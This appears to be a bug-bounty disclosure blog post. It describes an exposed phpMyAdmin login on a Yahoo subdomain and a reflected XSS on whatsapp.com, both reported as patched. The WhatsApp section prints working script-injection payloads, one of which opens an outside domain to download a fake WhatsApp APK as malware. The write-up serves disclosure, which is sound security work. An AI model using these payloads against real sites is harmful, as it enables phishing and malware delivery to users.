Yahoo Web Security Bug Bounty : Phpmyadmin access make data on risk

Yahoo Web Security Bug Bounty :  Phpmyadmin access make data on risk

 

Little Insight: 

 Vulnerability in Yahoo bug bounty  data on risk 

Vulnerable Website: 

http://tw.page.games.yahoo.net/phpmyadmin/setup/index.php?page=form&formset=Left_frame#tab_Left_tables


Impact: As you can see in the following screenshot I managed to login into phpmyadmin

 

Reward For  Phpmyadmin access  Vulnerability  : 500$

 

More Information

Thank you for your report, normally this would be out of scope but we felt this was a good find and we awarded a discretionary bounty.

The vulnerability mentioned here has been confirmed patched by the Yahoo Security Team.

 

WhatsApp : XSS vulnerability can be misused for Spreading Malware

   WhatsApp  XSS vulnerability can be misused for Spreading Malware 

 

 

 

 

Little Insight: 

[ According to FACEBOOK, This XSS could take advantage of the known domain to make phishing attacks easier or can be misused for Spreading Malware     ]

 

Reward For Whatsapp XSS  Vulnerability  : 1000$

My Finding....

Domain:  https://www.whatsapp.com

 Poc url :

https://www.whatsapp.com/index.php/"><script>alert(document.domain)</script>

but you can think a little different 

https://www.whatsapp.com/index.php/"><script>window.open("http://websecuritylog.com/whatsapp.apk")</script>

How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other domain and easily can spreading malware..

More Information

The vulnerability mentioned here has been confirmed patched by the Facebook Security Team.